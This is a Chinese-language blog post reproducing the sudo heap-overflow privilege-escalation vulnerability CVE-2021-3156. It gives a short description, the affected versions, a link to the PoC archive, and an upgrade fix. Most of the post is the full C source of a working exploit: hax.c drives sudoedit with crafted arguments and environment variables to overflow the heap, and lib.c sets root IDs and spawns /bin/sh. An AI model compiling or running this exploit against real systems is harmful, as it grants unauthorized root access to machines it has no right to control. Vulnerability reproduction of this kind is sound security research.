时间戳

首页 > 技术文章 > Linux sudo权限提升漏洞CVE-2021-3156 POC及复现过程

Linux sudo权限提升漏洞CVE-2021-3156 POC及复现过程

cHr1s 2021-01-31 00:30 原文

漏洞简介

2021年1月26日,国外研究团队披露了sudo 中存在的堆溢出漏洞(CVE-2021-3156)。利用该漏洞,非特权账户可以使用默认的sudo配置主机上获取root权限,该漏洞影响1.8.2到1.8.31p2的所有旧版本以及从1.9.0到1.9.5p1的所有稳定版本,国外研究人员已经可以Ubuntu 20.04,Debian 10,Fedora 33等系统上的利用该漏洞并提供了相关技术细节。

影响范围

sudo 1.8.2到1.8.31p2的所有版本

sudo 1.9.0到1.9.5p1的所有稳定版本

复现过程

漏洞POC地址:

https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz

靶机环境

复现过程

POC

hax.c

//
// CVE-2021-3156 PoC by blasty <peter@haxx.in>
// ===========================================
//
// Tested on:
// Ubunutu 20.0.4.1 LTS
// Sudo version 1.8.31
// Sudoers policy plugin version 1.8.31
// Sudoers file grammar version 46
// Sudoers I/O plugin version 1.8.31
// 
// shout out to Qualys for pumping out awesome bugs
// shout out to lockedbyte for coop hax. (shared tmux gdb sessions ftw)
// shout out to dsc for giving me extra cpu cycles to burn.
//
// Enjoy!
//
//   -- blasty // 20213001

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <ctype.h>

#define SUDOEDIT_PATH "/usr/bin/sudoedit"

int main(int argc, char *argv[]) {
	// CTF quality exploit below.
	char *s_argv[]={
		"sudoedit",
		"-u", "root", "-s",
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\",
		"\\",
		"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\\",
		NULL
	};

	char *s_envp[]={
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\",  
		"X/P0P_SH3LLZ_", "\\",
		"LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
		"LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
		"LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAA",
		NULL
	};

	printf("**** CVE-2021-3156 PoC by blasty <peter@haxx.in>\n");

	execve(SUDOEDIT_PATH, s_argv, s_envp);

	return 0;
}

lib.c

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
static void __attribute__ ((constructor)) _init(void);
 
static void _init(void) {
	printf("[+] bl1ng bl1ng! We got it!\n");
	setuid(0); seteuid(0); setgid(0); setegid(0);
	static char *a_argv[] = { "sh", NULL };
	static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
	execv("/bin/sh", a_argv);
}

修复方案

升级到安全版本:

  • 安全版本: Sudo ≥ 1.9.5p2

官方最新版本下载链接:https://www.sudo.ws/dist/

推荐阅读